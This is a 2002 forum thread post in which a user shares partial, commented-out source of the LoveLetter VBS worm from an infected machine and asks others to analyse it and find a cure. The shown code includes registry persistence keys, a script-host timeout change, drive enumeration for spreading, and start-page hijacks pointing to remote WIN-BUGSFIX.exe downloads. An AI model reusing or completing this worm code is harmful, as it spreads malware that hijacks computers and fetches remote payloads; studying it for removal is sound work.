Results 1 to 6 of 6

Thread: Pick this S-H-I-T apart...

Threaded View

  1. #1

    Thread Starter
    PowerPoster MidgetsBro's Avatar
    Join Date
    Oct 2000
    Location
    Apparently, Internet.com
    Posts
    3,125

    Unhappy Pick this S-H-I-T apart...

    My ex-girlfriend just got this virus, and she was kind enough to copy the code to a text file and send it to me. If anyone wants to pick this apart, have fun, and maybe figure out how to cure it so I don't have to reformat her hard drive...
    WARNING! VIRUS! DO NOT RUN!
    VB Code:
    1. 'Rem  barok -loveletter(vbe) <i hate go to school>
    2. 'Rem             by: spyder  /  [email][email protected][/email]  /  @GRAMMERSoft Group  /  Manila,Philippines
    3. 'On Error Resume Next
    4. 'Dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow
    5. 'eq = ""
    6. 'ctr = 0
    7. 'Set fso = CreateObject("Scripting.FileSystemObject")
    8. 'Set file = fso.OpenTextFile(WScript.ScriptFullName, 1)
    9. 'vbscopy = file.ReadAll
    10. 'main()
    11. 'Sub main()
    12. 'On Error Resume Next
    13. 'Dim wscr, rr
    14. 'Set wscr = CreateObject("WScript.Shell")
    15. 'rr = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
    16. 'If (rr >= 1) Then
    17. 'wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
    18. 'End If
    19.  
    20. '[color=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color]
    21.  
    22. 'html()
    23. 'spreadtoemail()
    24. 'listadriv()
    25. 'End Sub
    26. 'Sub regruns()
    27. 'On Error Resume Next
    28. 'Dim num, downread
    29. 'regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
    30. 'regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
    31. 'downread = ""
    32. 'downread = regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
    33. 'If (downread = "") Then
    34. 'downread = "c:\"
    35. 'End If
    36. 'if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
    37. 'Randomize
    38. 'num = Int((4 * Rnd) + 1)
    39. 'If num = 1 Then
    40. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
    41. 'ElseIf num = 2 Then
    42. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
    43. 'ElseIf num = 3 Then
    44. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
    45. 'ElseIf num = 4 Then
    46. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
    47. 'End If
    48. 'End If
    49.  
    50. '[color=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color]
    51.  
    52. 'End Sub
    53. 'Sub listadriv()
    54. 'On Error Resume Next
    55. 'Dim d, dc, s
    56. 'Set dc = fso.Drives
    57. 'For Each d In dc
    58. 'If d.DriveType = 2 Or d.DriveType = 3 Then
    59. 'folderlist(d.path&"\")
    60. 'End If
    61. 'Next
    62. 'listadriv = s
    63. 'End Sub
    Last edited by MidgetsBro; Apr 26th, 2002 at 01:30 AM.
    <removed by admin>

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width